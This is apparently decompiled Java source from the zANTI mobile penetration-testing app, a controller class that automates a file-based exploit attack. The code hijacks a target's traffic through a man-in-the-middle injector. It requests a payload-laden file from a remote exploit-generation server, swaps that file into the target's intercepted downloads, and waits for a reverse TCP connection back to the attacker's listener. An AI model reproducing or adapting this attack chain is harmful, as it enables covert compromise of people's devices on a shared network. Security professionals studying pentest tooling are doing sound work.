package com.zimperium.zanti.zetasploit;

import android.content.Intent;
import android.content.SharedPreferences;
import android.os.Environment;
import android.util.Log;
import com.zframework.Z;
import com.zimperium.zanti.Helpers;
import com.zimperium.zanti.R;
import com.zimperium.zanti.ZHttpInjector.ZHttpInjectorService;
import com.zimperium.zanti.ZHttpInjector.database.HttpRequestLogDB;
import com.zimperium.zanti.zetasploit.ZetasploitService;
import com.zimperium.zanti.zmitm.fragments.MITMServicePlugin;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.Arrays;
import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.params.HttpConnectionParams;
import org.apache.http.params.HttpParams;

/* loaded from: classes.dex */
public class ExploitController_File extends ExploitController {
    int exploit_port;
    boolean mitm_needs_cleanup;

    public ExploitController_File(ZetasploitService zetasploitService) {
        super(zetasploitService);
        this.mitm_needs_cleanup = true;
        this.exploit_port = -1;
    }

    private String downloadfile(String str) throws ClientProtocolException, IOException {
        DefaultHttpClient defaultHttpClient = new DefaultHttpClient();
        HttpParams params = defaultHttpClient.getParams();
        HttpConnectionParams.setConnectionTimeout(params, 20000);
        HttpConnectionParams.setSoTimeout(params, 20000);
        Log.d("ZZetasploit", "downloadfile url: " + str);
        HttpResponse execute = defaultHttpClient.execute(new HttpGet(str));
        Log.d("ZZetasploit", "downloadfile executed");
        InputStream content = execute.getEntity().getContent();
        if (content != null) {
            Log.d("ZZetasploit", "available InputStream" + content.available());
        }
        File file = new File(Environment.getExternalStorageDirectory(), "zetasploit_exploits");
        file.mkdirs();
        File createTempFile = File.createTempFile("exploit", this.zState.selectedExploit.exploitName, file);
        FileOutputStream fileOutputStream = new FileOutputStream(createTempFile);
        byte[] bArr = new byte[4096];
        notifyUpdateProgress(getApplicationContext().getString(R.string.downloading_generated_file_));
        while (true) {
            int read = content.read(bArr);
            if (read <= 0) {
                content.close();
                fileOutputStream.close();
                return createTempFile.getAbsolutePath();
            }
            fileOutputStream.write(bArr, 0, read);
        }
    }

    private String remote_create_exploit_file(int i) throws Exception {
        BufferedReader bufferedReader = null;
        StringBuffer stringBuffer = new StringBuffer();
        try {
            DefaultHttpClient defaultHttpClient = new DefaultHttpClient();
            HttpParams params = defaultHttpClient.getParams();
            HttpConnectionParams.setConnectionTimeout(params, 20000);
            HttpConnectionParams.setSoTimeout(params, 20000);
            String str = "https://" + this.service.getZetasploitHost() + "/create_exploit_file.php";
            Log.d("ZZetasploit", "create_exploit_file uri: " + str);
            HttpPost httpPost = new HttpPost(str);
            Log.d("ZZetasploit", "create_exploit_file lhost: " + Helpers.getLocalIpAddress(this.service));
            Log.d("ZZetasploit", "create_exploit_file lport: " + i);
            Log.d("ZZetasploit", "create_exploit_file  zState.target: " + this.zState.target);
            Log.d("ZZetasploit", "create_exploit_file zState.selectedPayload.payloadCommand: " + this.zState.selectedPayload.payloadCommand);
            Log.d("ZZetasploit", "create_exploit_file zState.selectedExploit.exploitName: " + this.zState.selectedExploit.exploitName);
            ArrayList<NameValuePair> arrayList = new ArrayList(2);
            arrayList.add(new BasicNameValuePair("lhost", Helpers.getLocalIpAddress(this.service)));
            arrayList.add(new BasicNameValuePair("lport", "" + i));
            arrayList.add(new BasicNameValuePair("target", this.zState.target));
            arrayList.add(new BasicNameValuePair("payload", this.zState.selectedPayload.payloadCommand));
            arrayList.add(new BasicNameValuePair("filetype", this.zState.selectedExploit.exploitName));
            arrayList.add(new BasicNameValuePair(HttpRequestLogDB.COLUMN_AUTH_DETAILS, "myauth"));
            for (NameValuePair nameValuePair : arrayList) {
                Log.d("ZZetasploit", "nameValuePair.getName: " + nameValuePair.getName() + " ,nameValuePair.getValue: " + nameValuePair.getValue());
            }
            httpPost.setEntity(new UrlEncodedFormEntity(arrayList));
            BufferedReader bufferedReader2 = new BufferedReader(new InputStreamReader(defaultHttpClient.execute(httpPost).getEntity().getContent()));
            while (true) {
                try {
                    String readLine = bufferedReader2.readLine();
                    if (readLine == null) {
                        throw new Exception("No OK received");
                    }
                    Log.i("zetasploit line", readLine);
                    String[] split = readLine.split("::::::", 2);
                    if (split.length == 2) {
                        if (!split[0].equals("OK")) {
                            throw new Exception("Bad OK received: " + split[1]);
                        }
                        String str2 = split[1];
                        this.zetasploitProgress.last_msf_result = stringBuffer.toString();
                        try {
                            bufferedReader2.close();
                        } catch (Exception e) {
                        }
                        return str2;
                    }
                    if (readLine.contains("[-] Exploit failed:")) {
                        this.zetasploitProgress.didFail = true;
                        notifyUpdateProgress(readLine);
                    }
                    stringBuffer.append(readLine + "\n");
                } catch (Throwable th) {
                    th = th;
                    bufferedReader = bufferedReader2;
                    this.zetasploitProgress.last_msf_result = stringBuffer.toString();
                    try {
                        bufferedReader.close();
                    } catch (Exception e2) {
                    }
                    throw th;
                }
            }
        } catch (Throwable th2) {
            th = th2;
        }
    }

    private void removeMITMRedirect() {
        Z.getAppContext().getSharedPreferences("zhttp", 0).edit().putBoolean("useInterceptDownload", false).remove("useIntercept_TYPE").remove("useIntercept_TYPE_MIME").remove("useIntercept_PATH").commit();
    }

    private void setupMITMRedirect(String str, String str2) throws Exception {
        String str3 = "." + str;
        String[] stringArray = this.service.getResources().getStringArray(R.array.file_types);
        String[] stringArray2 = this.service.getResources().getStringArray(R.array.file_types_mime);
        int indexOf = Arrays.asList(stringArray).indexOf(str3);
        if (indexOf < 0) {
            throw new Exception(getApplicationContext().getString(R.string.error_finding_correct_mime_type_for_selected_file_type_) + str3 + "'");
        }
        Z.getAppContext().getSharedPreferences("zhttp", 0).edit().putBoolean("useInterceptDownload", true).putString("useIntercept_TYPE", str3).putString("useIntercept_TYPE_MIME", stringArray2[indexOf]).putString("useIntercept_PATH", str2).commit();
    }

    private void setupMITMTarget() {
        Z.getAppContext().getSharedPreferences("zhttp", 0).edit().putBoolean("MITM_UseTarget", true).putString("MITM_Target", this.zState.target).commit();
    }

    private void startMITM() throws Exception {
        Intent intent = new Intent(this.service, (Class<?>) ZHttpInjectorService.class);
        intent.putExtra("ZHttpInjectorServicePlugin_extra", new MITMServicePlugin());
        this.service.startService(intent);
    }

    @Override // com.zimperium.zanti.zetasploit.ExploitController
    public void cleanup() {
        if (this.mitm_needs_cleanup) {
            this.service.stopService(new Intent(this.service, (Class<?>) ZHttpInjectorService.class));
            removeMITMRedirect();
        }
    }

    @Override // com.zimperium.zanti.zetasploit.ExploitController
    public void runExploitProcess() throws Exception {
        Log.d("ZZetasploit", "runExploitProcess");
        notifyUpdateProgress(getApplicationContext().getString(R.string.starting_cloud_based_file_exploit_process_));
        if (ZHttpInjectorService.serviceRunning) {
            this.mitm_needs_cleanup = false;
            SharedPreferences sharedPreferences = Z.getAppContext().getSharedPreferences("zhttp", 0);
            if (sharedPreferences.getBoolean("MITM_UseTarget", false)) {
                if (!this.zState.target.equals(sharedPreferences.getString("MITM_Target", "?"))) {
                    throw new Exception(getApplicationContext().getString(R.string.mitm_is_already_running_on_a_different_target_please_disable_mitm_and_try_again_));
                }
            }
        } else {
            notifyUpdateProgress(getApplicationContext().getString(R.string.starting_up_mitm_engine_));
            setupMITMTarget();
            startMITM();
        }
        int start_local_reverse_tcp_listener = this.service.start_local_reverse_tcp_listener();
        Log.d("ZZetasploit", "runExploitProcess start_local_reverse_tcp_listener lport: " + start_local_reverse_tcp_listener);
        notifyUpdateProgress(getApplicationContext().getString(R.string.creating_cloud_exploit_endpoint_));
        String remote_create_exploit_file = remote_create_exploit_file(start_local_reverse_tcp_listener);
        Log.d("ZZetasploit", "runExploitProcess remote_create_exploit_file url: " + remote_create_exploit_file);
        String downloadfile = downloadfile("https://" + this.service.getZetasploitHost() + ":10000/" + remote_create_exploit_file + "/");
        Log.d("ZZetasploit", "runExploitProcess localfilepath: " + downloadfile);
        setupMITMRedirect(this.zState.selectedExploit.exploitName, downloadfile);
        if (this.zetasploitProgress.didFail) {
            notifyUpdateProgress(this.zetasploitProgress.currentStatus);
            this.service.stopSelf();
            return;
        }
        if (this.zetasploitProgress.didFail || this.zetasploitProgress.didSucceed || this.zetasploitProgress.isUploadingPayload) {
            return;
        }
        notifyUpdateProgress(getApplicationContext().getString(R.string.waiting_for_connection_from_target_) + this.zState.target + "...");
        this.zetasploitProgress.wait_seconds_remaining = 1800;
        while (this.zetasploitProgress.wait_seconds_remaining > 0) {
            Thread.sleep(1000L);
            if (this.zetasploitProgress.didFail || this.zetasploitProgress.didSucceed || this.zetasploitProgress.isUploadingPayload) {
                return;
            }
            ZetasploitService.ZetasploitProgress zetasploitProgress = this.zetasploitProgress;
            zetasploitProgress.wait_seconds_remaining--;
            notifyUpdateProgress(getApplicationContext().getString(R.string.waiting_) + (this.zetasploitProgress.wait_seconds_remaining / 60) + ":" + (this.zetasploitProgress.wait_seconds_remaining % 60) + getApplicationContext().getString(R.string._minutes_for_an_exploit_response_));
        }
        if (this.zetasploitProgress.didSucceed) {
            return;
        }
        this.zetasploitProgress.didFail = true;
        notifyUpdateProgress(getApplicationContext().getString(R.string.cloud_exploit_failed_no_connection_from_target_));
        this.service.stopSelf();
    }
}
